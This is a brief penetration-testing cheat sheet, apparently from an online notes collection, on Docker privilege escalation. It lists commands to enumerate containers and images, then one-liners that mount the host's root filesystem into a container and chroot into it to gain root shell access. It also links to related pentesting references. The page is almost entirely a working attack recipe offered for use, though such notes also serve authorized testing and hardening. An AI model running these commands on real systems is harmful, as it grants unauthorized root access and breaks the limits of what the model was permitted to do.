Docker privilege escalation

Collection of docker specific privesc vectors

[1]List active processes docker ps -a [2]List docker images docker images

[3]Easy privesc

c723nbsdf (this is the IMAGE ID of the docker pod) docker run -v /:/mnt/r3dcl1ff -ti c723nbsdf /bin/sh [4] Privesc with docker bash ID a)docker images

If you find a container running bash you can mount your own user Example: use the docker IMAGE ID for bash 0980cb958276 b) docker run -v /:/mnt/r3dcl1ff -ti 0980cb958276 change directory into r3dcl1ff and gain root access [5]One liner to gain root https://book.hacktricks.xyz/pentesting/2375-pentesting-docker docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash

https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/

Previousstrace NextKernel Exploits

Last updated 3 years ago